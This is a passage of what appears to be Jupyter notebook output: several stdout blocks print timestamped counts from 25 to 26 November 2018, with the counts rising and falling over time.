"['2018-11-25 15:51:42.623394', 32]\n",
"['2018-11-25 15:51:58.380815', 33]\n",
"['2018-11-25 15:52:18.094010', 32]\n",
"['2018-11-25 15:52:22.980125', 33]\n",
"['2018-11-25 15:52:29.154186', 32]\n",
"['2018-11-25 15:52:30.783736', 33]\n",
"['2018-11-25 15:52:59.417520', 32]\n",
"['2018-11-25 15:54:02.627613', 31]\n",
"['2018-11-25 15:54:10.849846', 30]\n",
"['2018-11-25 15:54:27.926964', 31]\n",
"['2018-11-25 15:54:35.940834', 30]\n",
"['2018-11-25 15:54:46.128781', 29]\n",
"['2018-11-25 15:54:47.398911', 30]\n",
"['2018-11-25 15:54:53.362041', 29]\n",
"['2018-11-25 15:54:59.572596', 30]\n",
"['2018-11-25 15:55:25.060683', 31]\n",
"['2018-11-25 15:55:31.201785', 30]\n",
"['2018-11-25 15:55:37.177376', 29]\n",
"['2018-11-25 15:55:47.408583', 26]\n",
"['2018-11-25 15:56:05.236846', 25]\n",
"['2018-11-25 15:56:34.212321', 22]\n",
"['2018-11-25 15:57:04.250070', 21]\n",
"['2018-11-25 15:57:37.668628', 22]\n",
"['2018-11-25 15:57:45.678177', 21]\n",
"['2018-11-25 15:58:23.641663', 18]\n",
"['2018-11-25 15:59:46.283572', 8]\n",
"['2018-11-25 15:59:51.265710', 7]\n",
"['2018-11-25 16:00:06.260006', 6]\n",
"['2018-11-25 16:00:20.174774', 7]\n",
"['2018-11-25 16:00:20.640606', 8]\n",
"['2018-11-25 16:00:31.007190', 9]\n",
"['2018-11-25 16:01:11.402754', 10]\n",
"['2018-11-25 16:01:49.016424', 9]\n",
"['2018-11-25 16:01:59.701956', 10]\n",
"['2018-11-25 16:02:32.293083', 8]\n",
"['2018-11-25 16:04:28.842118', 7]\n",
"['2018-11-25 16:04:29.677989', 8]\n",
"['2018-11-25 16:04:59.724256', 7]\n",
"['2018-11-25 16:05:13.845577', 5]\n",
"['2018-11-25 16:06:21.940831', 6]\n",
"['2018-11-25 16:10:26.171296', 5]\n",
"['2018-11-25 16:11:39.341196', 4]\n",
"['2018-11-25 16:16:49.308357', 2]\n",
"['2018-11-25 16:21:00.611467', 3]\n",
"['2018-11-25 16:24:50.079451', 4]\n",
"['2018-11-25 16:25:12.797771', 3]\n",
"['2018-11-25 16:27:02.407166', 4]\n",
"['2018-11-25 16:27:48.470771', 5]\n",
"['2018-11-25 16:29:33.536880', 4]\n",
"['2018-11-25 16:29:59.326275', 5]\n",
"['2018-11-25 16:30:32.998582', 6]\n",
"['2018-11-25 16:30:59.527810', 7]\n",
"['2018-11-25 16:31:11.710984', 8]\n",
"['2018-11-25 16:31:16.724425', 9]\n",
"['2018-11-25 16:31:19.046962', 10]\n",
"['2018-11-25 16:31:22.050949', 11]\n",
"['2018-11-25 16:31:28.560866', 10]\n",
"['2018-11-25 16:31:30.759947', 11]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-25 16:31:34.652979', 12]\n",
"['2018-11-25 16:31:37.863574', 13]\n",
"['2018-11-25 16:31:46.397925', 14]\n",
"['2018-11-25 16:31:49.278903', 15]\n",
"['2018-11-25 16:31:54.802112', 16]\n",
"['2018-11-25 16:32:24.763460', 17]\n",
"['2018-11-25 16:32:26.770996', 18]\n",
"['2018-11-25 16:32:29.282421', 19]\n",
"['2018-11-25 16:33:07.271964', 20]\n",
"['2018-11-25 16:33:18.662266', 21]\n",
"['2018-11-25 16:34:00.152404', 20]\n",
"['2018-11-25 16:34:30.476697', 21]\n",
"['2018-11-25 16:34:46.387293', 20]\n",
"['2018-11-25 16:35:04.457977', 21]\n",
"['2018-11-25 16:35:50.109793', 22]\n",
"['2018-11-25 16:36:14.865590', 23]\n",
"['2018-11-25 16:36:45.288882', 24]\n",
"['2018-11-25 16:37:00.658086', 25]\n",
"['2018-11-25 16:37:17.265279', 26]\n",
"['2018-11-25 16:37:21.724588', 27]\n",
"['2018-11-25 16:37:39.641386', 26]\n",
"['2018-11-25 16:37:43.986356', 27]\n",
"['2018-11-25 16:37:46.715032', 28]\n",
"['2018-11-25 16:38:26.767366', 27]\n",
"['2018-11-25 16:39:17.153861', 25]\n",
"['2018-11-25 16:39:30.591688', 26]\n",
"['2018-11-25 16:39:34.710597', 27]\n",
"['2018-11-25 16:40:14.052870', 25]\n",
"['2018-11-25 16:40:15.644637', 26]\n",
"['2018-11-25 16:42:07.882519', 19]\n",
"['2018-11-25 16:42:08.034244', 20]\n",
"['2018-11-25 16:42:15.866477', 21]\n",
"['2018-11-25 16:42:22.857860', 20]\n",
"['2018-11-25 16:42:26.273265', 21]\n",
"['2018-11-25 16:42:28.317345', 22]\n",
"['2018-11-25 16:42:51.556773', 23]\n",
"['2018-11-25 16:42:58.319922', 22]\n",
"['2018-11-25 16:43:01.495119', 23]\n",
"['2018-11-25 16:43:07.787776', 22]\n",
"['2018-11-25 16:43:25.988289', 23]\n",
"['2018-11-25 16:43:46.571196', 22]\n",
"['2018-11-25 16:43:50.626006', 21]\n",
"['2018-11-25 16:44:01.272437', 20]\n",
"['2018-11-25 16:44:18.825371', 16]\n",
"['2018-11-25 16:44:23.830925', 15]\n",
"['2018-11-25 16:46:01.286227', 9]\n",
"['2018-11-25 16:47:05.163468', 7]\n",
"['2018-11-25 16:47:27.259426', 6]\n",
"['2018-11-25 16:48:05.273049', 3]\n",
"['2018-11-25 16:49:01.225703', 4]\n",
"['2018-11-25 16:51:43.730699', 3]\n",
"['2018-11-25 17:06:01.363591', 2]\n",
"['2018-11-25 17:06:52.248373', 3]\n",
"['2018-11-25 17:08:04.639661', 4]\n",
"['2018-11-25 17:08:50.033301', 5]\n",
"['2018-11-25 17:09:59.695603', 6]\n",
"['2018-11-25 17:11:00.113011', 5]\n",
"['2018-11-25 17:11:00.626685', 6]\n",
"['2018-11-25 17:11:18.499672', 7]\n",
"['2018-11-25 17:11:24.021596', 8]\n",
"['2018-11-25 17:12:13.199751', 9]\n",
"['2018-11-25 17:13:05.251593', 10]\n",
"['2018-11-25 17:13:20.858384', 11]\n",
"['2018-11-25 17:13:33.812410', 10]\n",
"['2018-11-25 17:14:02.001165', 11]\n",
"['2018-11-25 17:14:19.555421', 12]\n",
"['2018-11-25 17:15:39.336945', 11]\n",
"['2018-11-25 17:16:10.983772', 12]\n",
"['2018-11-25 17:16:29.487852', 13]\n",
"['2018-11-25 17:16:31.329230', 14]\n",
"['2018-11-25 17:16:36.947712', 13]\n",
"['2018-11-25 17:16:37.134547', 14]\n",
"['2018-11-25 17:16:39.353228', 15]\n",
"['2018-11-25 17:16:40.893073', 16]\n",
"['2018-11-25 17:16:41.082396', 17]\n",
"['2018-11-25 17:16:42.846544', 18]\n",
"['2018-11-25 17:16:44.522018', 19]\n",
"['2018-11-25 17:16:45.523793', 20]\n",
"['2018-11-25 17:16:46.924433', 21]\n",
"['2018-11-25 17:16:48.805022', 22]\n",
"['2018-11-25 17:16:49.651219', 23]\n",
"['2018-11-25 17:17:10.553619', 24]\n",
"['2018-11-25 17:17:12.669044', 25]\n",
"['2018-11-25 17:17:24.837912', 24]\n",
"['2018-11-25 17:17:43.952482', 25]\n",
"['2018-11-25 17:18:01.936829', 26]\n",
"['2018-11-25 17:18:17.138060', 27]\n",
"['2018-11-25 17:18:23.797907', 28]\n",
"['2018-11-25 17:18:31.117943', 27]\n",
"['2018-11-25 17:18:52.215904', 28]\n",
"['2018-11-25 17:18:55.827089', 29]\n",
"['2018-11-25 17:19:18.639143', 30]\n",
"['2018-11-25 17:19:18.909032', 31]\n",
"['2018-11-25 17:19:22.625258', 30]\n",
"['2018-11-25 17:19:42.308508', 29]\n",
"['2018-11-25 17:20:10.533839', 28]\n",
"['2018-11-25 17:20:15.991040', 27]\n",
"['2018-11-25 17:20:33.181901', 28]\n",
"['2018-11-25 17:20:37.683859', 29]\n",
"['2018-11-25 17:20:39.674509', 30]\n",
"['2018-11-25 17:20:41.347097', 31]\n",
"['2018-11-25 17:21:03.263032', 32]\n",
"['2018-11-25 17:21:10.533179', 31]\n",
"['2018-11-25 17:21:33.320142', 30]\n",
"['2018-11-25 17:21:41.818638', 29]\n",
"['2018-11-25 17:22:08.767107', 30]\n",
"['2018-11-25 17:22:18.651864', 29]\n",
"['2018-11-25 17:22:32.707304', 28]\n",
"['2018-11-25 17:22:36.559611', 29]\n",
"['2018-11-25 17:22:39.146095', 28]\n",
"['2018-11-25 17:22:39.355644', 29]\n",
"['2018-11-25 17:22:58.051719', 28]\n",
"['2018-11-25 17:23:22.453904', 29]\n",
"['2018-11-25 17:24:02.661534', 30]\n",
"['2018-11-25 17:24:34.323819', 29]\n",
"['2018-11-25 17:24:40.474901', 30]\n",
"['2018-11-25 17:24:43.475550', 28]\n",
"['2018-11-25 17:25:14.643776', 29]\n",
"['2018-11-25 17:25:29.634551', 28]\n",
"['2018-11-25 17:25:50.869910', 29]\n",
"['2018-11-25 17:27:31.689927', 24]\n",
"['2018-11-25 17:28:45.831833', 21]\n",
"['2018-11-25 17:29:29.188301', 10]\n",
"['2018-11-25 17:29:51.964862', 8]\n",
"['2018-11-25 17:30:21.957025', 6]\n",
"['2018-11-25 17:31:12.563133', 7]\n",
"['2018-11-25 17:35:26.713227', 5]\n",
"['2018-11-25 17:35:31.957244', 6]\n",
"['2018-11-25 17:35:40.690950', 5]\n",
"['2018-11-25 17:36:16.691089', 3]\n",
"['2018-11-25 17:36:29.467386', 4]\n",
"['2018-11-25 17:44:19.924858', 2]\n",
"['2018-11-25 17:47:45.544428', 3]\n",
"['2018-11-25 17:52:23.016316', 2]\n",
"['2018-11-25 17:55:55.921996', 3]\n",
"['2018-11-25 17:56:44.191981', 2]\n",
"['2018-11-25 17:56:54.908898', 3]\n",
"['2018-11-25 17:57:14.432908', 4]\n",
"['2018-11-25 17:57:49.383284', 5]\n",
"['2018-11-25 17:57:50.240867', 6]\n",
"['2018-11-25 17:58:09.180497', 7]\n",
"['2018-11-25 17:58:21.542782', 8]\n",
"['2018-11-25 17:59:05.124154', 9]\n",
"['2018-11-25 17:59:59.579968', 10]\n",
"['2018-11-25 18:00:19.674515', 11]\n",
"['2018-11-25 18:00:25.116237', 12]\n",
"['2018-11-25 18:00:28.558219', 13]\n",
"['2018-11-25 18:00:29.813583', 14]\n",
"['2018-11-25 18:00:30.235621', 15]\n",
"['2018-11-25 18:00:33.490992', 16]\n",
"['2018-11-25 18:00:35.191292', 17]\n",
"['2018-11-25 18:00:36.841324', 18]\n",
"['2018-11-25 18:00:39.254371', 19]\n",
"['2018-11-25 18:00:49.831184', 20]\n",
"['2018-11-25 18:00:50.888211', 21]\n",
"['2018-11-25 18:00:50.896014', 22]\n",
"['2018-11-25 18:00:51.072296', 23]\n",
"['2018-11-25 18:01:01.349005', 24]\n",
"['2018-11-25 18:01:09.745197', 25]\n",
"['2018-11-25 18:01:10.544401', 26]\n",
"['2018-11-25 18:01:11.337997', 27]\n",
"['2018-11-25 18:01:15.376911', 26]\n",
"['2018-11-25 18:01:17.331666', 27]\n",
"['2018-11-25 18:01:18.077658', 28]\n",
"['2018-11-25 18:01:20.087545', 29]\n",
"['2018-11-25 18:01:22.240882', 30]\n",
"['2018-11-25 18:01:23.899923', 31]\n",
"['2018-11-25 18:01:25.397813', 32]\n",
"['2018-11-25 18:01:35.146595', 33]\n",
"['2018-11-25 18:01:39.377132', 34]\n",
"['2018-11-25 18:01:49.154278', 35]\n",
"['2018-11-25 18:01:51.350380', 34]\n",
"['2018-11-25 18:01:55.524599', 35]\n",
"['2018-11-25 18:02:14.004277', 36]\n",
"['2018-11-25 18:02:32.236259', 37]\n",
"['2018-11-25 18:02:34.701388', 38]\n",
"['2018-11-25 18:03:01.844211', 37]\n",
"['2018-11-25 18:03:03.089000', 38]\n",
"['2018-11-25 18:03:06.079750', 37]\n",
"['2018-11-25 18:03:32.621183', 36]\n",
"['2018-11-25 18:04:09.455366', 37]\n",
"['2018-11-25 18:04:25.365172', 36]\n",
"['2018-11-25 18:04:30.042626', 35]\n",
"['2018-11-25 18:04:31.878183', 36]\n",
"['2018-11-25 18:04:36.781908', 35]\n",
"['2018-11-25 18:05:01.201787', 34]\n",
"['2018-11-25 18:05:16.137970', 33]\n",
"['2018-11-25 18:05:45.192573', 31]\n",
"['2018-11-25 18:06:24.037899', 32]\n",
"['2018-11-25 18:06:31.847098', 31]\n",
"['2018-11-25 18:06:34.902177', 30]\n",
"['2018-11-25 18:06:36.995001', 31]\n",
"['2018-11-25 18:06:37.359634', 32]\n",
"['2018-11-25 18:06:45.192533', 31]\n",
"['2018-11-25 18:06:49.728615', 32]\n",
"['2018-11-25 18:06:56.682361', 33]\n",
"['2018-11-25 18:06:59.230254', 34]\n",
"['2018-11-25 18:07:07.160940', 33]\n",
"['2018-11-25 18:07:10.547946', 32]\n",
"['2018-11-25 18:07:12.156615', 33]\n",
"['2018-11-25 18:07:12.531398', 34]\n",
"['2018-11-25 18:07:13.601333', 35]\n",
"['2018-11-25 18:07:20.089824', 36]\n",
"['2018-11-25 18:07:23.470589', 35]\n",
"['2018-11-25 18:07:33.401341', 34]\n",
"['2018-11-25 18:07:54.096647', 33]\n",
"['2018-11-25 18:08:03.289867', 34]\n",
"['2018-11-25 18:08:03.877416', 35]\n",
"['2018-11-25 18:08:04.163027', 36]\n",
"['2018-11-25 18:08:11.069745', 37]\n",
"['2018-11-25 18:08:17.755495', 38]\n",
"['2018-11-25 18:08:21.161547', 37]\n",
"['2018-11-25 18:08:28.545692', 38]\n",
"['2018-11-25 18:08:30.101235', 37]\n",
"['2018-11-25 18:08:31.904885', 36]\n",
"['2018-11-25 18:08:37.771374', 37]\n",
"['2018-11-25 18:09:18.153794', 38]\n",
"['2018-11-25 18:09:22.375198', 39]\n",
"['2018-11-25 18:09:55.914851', 40]\n",
"['2018-11-25 18:10:06.515293', 41]\n",
"['2018-11-25 18:10:06.899866', 42]\n",
"['2018-11-25 18:10:14.496809', 43]\n",
"['2018-11-25 18:10:32.954886', 42]\n",
"['2018-11-25 18:10:56.842640', 41]\n",
"['2018-11-25 18:13:10.363139', 27]\n",
"['2018-11-25 18:13:18.245307', 24]\n",
"['2018-11-25 18:13:50.207707', 19]\n",
"['2018-11-25 18:14:22.457151', 12]\n",
"['2018-11-25 18:16:19.911555', 6]\n",
"['2018-11-25 18:16:25.920103', 7]\n",
"['2018-11-25 18:16:28.061653', 8]\n",
"['2018-11-25 18:16:47.107364', 9]\n",
"['2018-11-25 18:17:13.545408', 8]\n",
"['2018-11-25 18:18:24.992685', 7]\n",
"['2018-11-25 18:19:02.211539', 8]\n",
"['2018-11-25 18:19:27.014343', 9]\n",
"['2018-11-25 18:20:04.817249', 10]\n",
"['2018-11-25 18:20:31.006331', 8]\n",
"['2018-11-25 18:20:58.966752', 7]\n",
"['2018-11-25 18:21:32.962738', 8]\n",
"['2018-11-25 18:21:37.429186', 9]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-25 18:22:32.647325', 7]\n",
"['2018-11-25 18:23:15.103406', 8]\n",
"['2018-11-25 18:24:14.591404', 6]\n",
"['2018-11-25 18:36:10.849821', 2]\n",
"['2018-11-25 18:37:59.088205', 3]\n",
"['2018-11-25 18:43:41.157184', 4]\n",
"['2018-11-25 18:44:27.486279', 5]\n",
"['2018-11-25 18:45:20.427792', 6]\n",
"['2018-11-25 18:45:20.938091', 7]\n",
"['2018-11-25 18:45:34.255212', 6]\n",
"['2018-11-25 18:45:55.251275', 7]\n",
"['2018-11-25 18:46:26.542160', 8]\n",
"['2018-11-25 18:47:04.594881', 9]\n",
"['2018-11-25 18:47:30.854336', 10]\n",
"['2018-11-25 18:47:39.558746', 11]\n",
"['2018-11-25 18:47:46.402209', 12]\n",
"['2018-11-25 18:47:59.619865', 13]\n",
"['2018-11-25 18:48:03.683410', 14]\n",
"['2018-11-25 18:48:10.556976', 15]\n",
"['2018-11-25 18:48:17.625459', 16]\n",
"['2018-11-25 18:48:20.462706', 17]\n",
"['2018-11-25 18:48:45.711867', 15]\n",
"['2018-11-25 18:48:53.002299', 16]\n",
"['2018-11-25 18:49:07.214368', 17]\n",
"['2018-11-25 18:49:15.708604', 18]\n",
"['2018-11-25 18:49:33.897351', 19]\n",
"['2018-11-25 18:50:43.041125', 18]\n",
"['2018-11-25 18:50:51.840763', 17]\n",
"['2018-11-25 18:51:06.423211', 16]\n",
"['2018-11-25 18:51:17.983959', 17]\n",
"['2018-11-25 18:51:20.046080', 18]\n",
"['2018-11-25 18:51:33.324018', 17]\n",
"['2018-11-25 18:52:08.633624', 16]\n",
"['2018-11-25 18:52:20.689886', 17]\n",
"['2018-11-25 18:52:27.453322', 18]\n",
"['2018-11-25 18:52:29.513069', 19]\n",
"['2018-11-25 18:53:35.723549', 18]\n",
"['2018-11-25 18:53:40.868142', 19]\n",
"['2018-11-25 18:54:25.424593', 20]\n",
"['2018-11-25 18:54:39.178278', 21]\n",
"['2018-11-25 18:54:52.707116', 22]\n",
"['2018-11-25 18:55:14.973751', 23]\n",
"['2018-11-25 18:55:27.193115', 24]\n",
"['2018-11-25 18:55:32.952091', 25]\n",
"['2018-11-25 18:55:33.538169', 26]\n",
"['2018-11-25 18:57:10.371173', 25]\n",
"['2018-11-25 18:57:32.275966', 24]\n",
"['2018-11-25 18:57:36.289115', 25]\n",
"['2018-11-25 18:57:45.405760', 24]\n",
"['2018-11-25 18:58:13.755722', 23]\n",
"['2018-11-25 18:58:25.858571', 20]\n",
"['2018-11-25 18:58:35.353441', 19]\n",
"['2018-11-25 18:58:40.991455', 17]\n",
"['2018-11-25 18:58:53.922213', 16]\n",
"['2018-11-25 18:59:08.183423', 15]\n",
"['2018-11-25 18:59:23.012476', 13]\n",
"['2018-11-25 18:59:43.027677', 10]\n",
"['2018-11-25 18:59:45.099133', 8]\n",
"['2018-11-25 19:00:03.834383', 9]\n",
"['2018-11-25 19:00:04.110870', 10]\n",
"['2018-11-25 19:00:11.111766', 11]\n",
"['2018-11-25 19:00:17.817205', 10]\n",
"['2018-11-25 19:00:32.962000', 11]\n",
"['2018-11-25 19:00:37.818061', 12]\n",
"['2018-11-25 19:00:49.210073', 13]\n",
"['2018-11-25 19:02:40.014564', 12]\n",
"['2018-11-25 19:03:15.871209', 11]\n",
"['2018-11-25 19:03:28.406737', 10]\n",
"['2018-11-25 19:03:35.866848', 11]\n",
"['2018-11-25 19:03:44.767643', 12]\n",
"['2018-11-25 19:04:33.288951', 10]\n",
"['2018-11-25 19:05:50.273123', 5]\n",
"['2018-11-25 19:07:40.167029', 4]\n",
"['2018-11-25 19:07:54.974184', 3]\n",
"['2018-11-25 19:20:15.437183', 2]\n",
"['2018-11-25 19:20:44.799466', 3]\n",
"['2018-11-25 19:21:57.127938', 4]\n",
"['2018-11-25 19:22:48.419606', 5]\n",
"['2018-11-25 19:23:03.964004', 6]\n",
"['2018-11-25 19:24:05.520880', 7]\n",
"['2018-11-25 19:28:05.550587', 4]\n",
"['2018-11-25 19:28:16.604773', 5]\n",
"['2018-11-25 19:28:53.539481', 6]\n",
"['2018-11-25 19:29:30.786441', 7]\n",
"['2018-11-25 19:29:35.217935', 8]\n",
"['2018-11-25 19:29:43.338888', 9]\n",
"['2018-11-25 19:29:51.750695', 8]\n",
"['2018-11-25 19:30:49.657802', 9]\n",
"['2018-11-25 19:30:49.973085', 10]\n",
"['2018-11-25 19:31:08.259691', 11]\n",
"['2018-11-25 19:31:09.813574', 12]\n",
"['2018-11-25 19:31:19.807650', 13]\n",
"['2018-11-25 19:31:27.066877', 14]\n",
"['2018-11-25 19:31:39.402500', 15]\n",
"['2018-11-25 19:31:45.862580', 16]\n",
"['2018-11-25 19:32:27.066714', 13]\n",
"['2018-11-25 19:32:43.204822', 14]\n",
"['2018-11-25 19:32:45.162653', 15]\n",
"['2018-11-25 19:32:50.730654', 16]\n",
"['2018-11-25 19:32:53.653110', 15]\n",
"['2018-11-25 19:33:01.838627', 16]\n",
"['2018-11-25 19:33:10.340087', 17]\n",
"['2018-11-25 19:33:10.567460', 18]\n",
"['2018-11-25 19:33:20.141810', 19]\n",
"['2018-11-25 19:33:31.872251', 18]\n",
"['2018-11-25 19:34:14.233229', 19]\n",
"['2018-11-25 19:34:28.783286', 18]\n",
"['2018-11-25 19:34:31.369289', 19]\n",
"['2018-11-25 19:34:50.734627', 18]\n",
"['2018-11-25 19:34:52.893288', 19]\n",
"['2018-11-25 19:34:53.745905', 20]\n",
"['2018-11-25 19:35:21.427981', 18]\n",
"['2018-11-25 19:36:10.566981', 17]\n",
"['2018-11-25 19:36:50.727247', 15]\n",
"['2018-11-25 19:37:07.267284', 16]\n",
"['2018-11-25 19:37:34.627637', 17]\n",
"['2018-11-25 19:37:40.112646', 18]\n",
"['2018-11-25 19:37:41.136206', 19]\n",
"['2018-11-25 19:38:13.830259', 20]\n",
"['2018-11-25 19:38:41.385592', 19]\n",
"['2018-11-25 19:39:04.484532', 20]\n",
"['2018-11-25 19:40:02.725413', 21]\n",
"['2018-11-25 19:40:12.061838', 22]\n",
"['2018-11-25 19:40:26.172777', 21]\n",
"['2018-11-25 19:41:02.112474', 20]\n",
"['2018-11-25 19:41:24.031967', 18]\n",
"['2018-11-25 19:42:13.388328', 19]\n",
"['2018-11-25 19:42:26.421724', 18]\n",
"['2018-11-25 19:42:26.811430', 19]\n",
"['2018-11-25 19:43:17.697137', 18]\n",
"['2018-11-25 19:43:35.939051', 19]\n",
"['2018-11-25 19:43:44.020133', 18]\n",
"['2018-11-25 19:44:05.972615', 15]\n",
"['2018-11-25 19:44:14.061751', 13]\n",
"['2018-11-25 19:44:28.441378', 10]\n",
"['2018-11-25 19:44:54.684237', 11]\n",
"['2018-11-25 19:45:31.845147', 12]\n",
"['2018-11-25 19:46:00.775837', 11]\n",
"['2018-11-25 19:46:34.291081', 9]\n",
"['2018-11-25 19:47:35.300868', 8]\n",
"['2018-11-25 19:47:41.798746', 9]\n",
"['2018-11-25 19:47:45.142991', 8]\n",
"['2018-11-25 19:49:39.392138', 5]\n",
"['2018-11-25 19:54:18.163915', 2]\n",
"['2018-11-25 20:05:59.464829', 3]\n",
"['2018-11-25 20:06:27.805908', 4]\n",
"['2018-11-25 20:07:31.752183', 5]\n",
"['2018-11-25 20:08:00.585028', 6]\n",
"['2018-11-25 20:10:58.647929', 4]\n",
"['2018-11-25 20:11:14.126636', 5]\n",
"['2018-11-25 20:12:54.833053', 4]\n",
"['2018-11-25 20:13:40.307515', 5]\n",
"['2018-11-25 20:13:53.077019', 6]\n",
"['2018-11-25 20:13:54.384444', 7]\n",
"['2018-11-25 20:14:10.577239', 8]\n",
"['2018-11-25 20:14:27.087117', 9]\n",
"['2018-11-25 20:19:59.363426', 2]\n",
"['2018-11-25 20:59:35.651231', 3]\n",
"['2018-11-25 21:19:03.578305', 2]\n",
"['2018-11-26 04:44:49.811693', 3]\n",
"['2018-11-26 04:53:00.680529', 2]\n",
"['2018-11-26 04:54:52.146736', 3]\n",
"['2018-11-26 04:54:53.047661', 4]\n",
"['2018-11-26 05:36:50.861981', 2]\n",
"['2018-11-26 05:41:34.925399', 3]\n",
"['2018-11-26 05:59:54.532503', 2]\n",
"['2018-11-26 06:06:57.408477', 3]\n",
"['2018-11-26 06:08:43.394911', 2]\n",
"['2018-11-26 06:09:20.931711', 3]\n",
"['2018-11-26 06:09:47.186591', 4]\n",
"['2018-11-26 06:10:14.936715', 5]\n",
"['2018-11-26 06:10:47.418155', 6]\n",
"['2018-11-26 06:10:47.542923', 7]\n",
"['2018-11-26 06:11:10.963642', 8]\n",
"['2018-11-26 06:12:50.868531', 9]\n",
"['2018-11-26 06:13:00.062255', 10]\n",
"['2018-11-26 06:13:21.430134', 9]\n",
"['2018-11-26 06:13:33.778452', 8]\n",
"['2018-11-26 06:13:47.531459', 7]\n",
"['2018-11-26 06:15:56.321556', 8]\n",
"['2018-11-26 06:16:04.015999', 9]\n",
"['2018-11-26 06:17:52.188229', 10]\n",
"['2018-11-26 06:18:24.718943', 11]\n",
"['2018-11-26 06:26:49.390015', 2]\n",
"['2018-11-26 06:29:44.254726', 3]\n",
"['2018-11-26 06:51:17.993165', 2]\n",
"['2018-11-26 06:54:18.080345', 3]\n",
"['2018-11-26 06:54:30.289237', 4]\n",
"['2018-11-26 06:55:06.614292', 5]\n",
"['2018-11-26 06:55:11.250843', 6]\n",
"['2018-11-26 06:57:01.182686', 7]\n",
"['2018-11-26 06:59:45.686869', 8]\n",
"['2018-11-26 07:00:07.196600', 9]\n",
"['2018-11-26 07:01:13.773360', 7]\n",
"['2018-11-26 07:01:34.711663', 5]\n",
"['2018-11-26 07:02:21.238763', 6]\n",
"['2018-11-26 07:02:29.468831', 7]\n",
"['2018-11-26 07:02:31.851140', 8]\n",
"['2018-11-26 07:02:36.061820', 9]\n",
"['2018-11-26 07:02:36.780881', 10]\n",
"['2018-11-26 07:02:38.957874', 11]\n",
"['2018-11-26 07:02:47.558037', 12]\n",
"['2018-11-26 07:02:48.499069', 13]\n",
"['2018-11-26 07:02:59.151448', 14]\n",
"['2018-11-26 07:03:40.118557', 15]\n",
"['2018-11-26 07:03:41.171957', 16]\n",
"['2018-11-26 07:03:46.465153', 15]\n",
"['2018-11-26 07:04:10.131544', 16]\n",
"['2018-11-26 07:04:31.303888', 17]\n",
"['2018-11-26 07:04:36.379986', 18]\n",
"['2018-11-26 07:04:37.800190', 17]\n",
"['2018-11-26 07:04:48.464503', 18]\n",
"['2018-11-26 07:04:58.965215', 19]\n",
"['2018-11-26 07:05:14.628199', 20]\n",
"['2018-11-26 07:05:18.825692', 21]\n",
"['2018-11-26 07:05:42.998322', 22]\n",
"['2018-11-26 07:05:46.538988', 23]\n",
"['2018-11-26 07:06:15.125134', 24]\n",
"['2018-11-26 07:06:27.917058', 23]\n",
"['2018-11-26 07:06:39.776614', 21]\n",
"['2018-11-26 07:06:50.887044', 20]\n",
"['2018-11-26 07:06:52.175641', 21]\n",
"['2018-11-26 07:07:03.019175', 22]\n",
"['2018-11-26 07:07:04.653429', 23]\n",
"['2018-11-26 07:07:25.704682', 22]\n",
"['2018-11-26 07:08:04.865751', 23]\n",
"['2018-11-26 07:08:10.712787', 22]\n",
"['2018-11-26 07:08:11.740108', 23]\n",
"['2018-11-26 07:08:17.591729', 24]\n",
"['2018-11-26 07:08:48.719215', 25]\n",
"['2018-11-26 07:08:59.223147', 24]\n",
"['2018-11-26 07:09:10.094731', 25]\n",
"['2018-11-26 07:09:20.141099', 24]\n",
"['2018-11-26 07:09:37.917785', 23]\n",
"['2018-11-26 07:10:01.349784', 22]\n",
"['2018-11-26 07:10:17.955398', 23]\n",
"['2018-11-26 07:10:45.854067', 24]\n",
"['2018-11-26 07:11:10.797081', 23]\n",
"['2018-11-26 07:11:11.651655', 24]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-26 07:11:50.445310', 23]\n",
"['2018-11-26 07:12:14.020880', 22]\n",
"['2018-11-26 07:12:29.968818', 21]\n",
"['2018-11-26 07:12:52.208936', 22]\n",
"['2018-11-26 07:13:00.798011', 21]\n",
"['2018-11-26 07:13:27.208946', 20]\n",
"['2018-11-26 07:13:47.134467', 21]\n",
"['2018-11-26 07:14:17.498440', 18]\n",
"['2018-11-26 07:14:34.825117', 19]\n",
"['2018-11-26 07:14:49.753577', 18]\n",
"['2018-11-26 07:15:20.835212', 17]\n",
"['2018-11-26 07:15:28.319343', 16]\n",
"['2018-11-26 07:15:55.437902', 14]\n",
"['2018-11-26 07:15:57.465699', 13]\n",
"['2018-11-26 07:16:15.576815', 14]\n",
"['2018-11-26 07:17:36.376028', 13]\n",
"['2018-11-26 07:17:51.956826', 14]\n",
"['2018-11-26 07:18:36.477847', 13]\n",
"['2018-11-26 07:19:23.037213', 11]\n",
"['2018-11-26 07:19:50.968974', 12]\n",
"['2018-11-26 07:20:26.537042', 11]\n",
"['2018-11-26 07:21:00.743900', 10]\n",
"['2018-11-26 07:21:04.352866', 11]\n",
"['2018-11-26 07:22:02.657832', 10]\n",
"['2018-11-26 07:23:10.827871', 8]\n",
"['2018-11-26 07:23:48.240422', 9]\n",
"['2018-11-26 07:24:10.828697', 7]\n",
"['2018-11-26 07:25:15.517166', 8]\n",
"['2018-11-26 07:25:26.108650', 9]\n",
"['2018-11-26 07:25:49.746001', 8]\n",
"['2018-11-26 07:26:23.921589', 7]\n",
"['2018-11-26 07:34:31.718480', 2]\n",
"['2018-11-26 07:35:01.707452', 3]\n",
"['2018-11-26 07:36:57.324208', 4]\n",
"['2018-11-26 07:37:05.543308', 5]\n",
"['2018-11-26 07:39:15.674994', 6]\n",
"['2018-11-26 07:41:09.816348', 7]\n",
"['2018-11-26 07:42:01.352067', 6]\n",
"['2018-11-26 07:45:00.774172', 7]\n",
"['2018-11-26 07:45:32.039026', 6]\n",
"['2018-11-26 07:46:34.868335', 7]\n",
"['2018-11-26 07:47:07.722463', 8]\n",
"['2018-11-26 07:48:55.875052', 9]\n",
"['2018-11-26 07:49:04.498012', 10]\n",
"['2018-11-26 07:50:45.288728', 11]\n",
"['2018-11-26 07:51:29.511390', 10]\n",
"['2018-11-26 07:51:47.403966', 11]\n",
"['2018-11-26 07:52:40.969308', 12]\n",
"['2018-11-26 07:53:05.920255', 11]\n",
"['2018-11-26 07:53:29.953075', 10]\n",
"['2018-11-26 07:53:38.569745', 11]\n",
"['2018-11-26 07:53:50.292667', 10]\n",
"['2018-11-26 07:55:39.777872', 11]\n",
"['2018-11-26 07:56:24.846926', 12]\n",
"['2018-11-26 07:56:38.463200', 13]\n",
"['2018-11-26 07:56:43.986854', 10]\n",
"['2018-11-26 07:56:57.566265', 11]\n",
"['2018-11-26 07:57:39.206600', 10]\n",
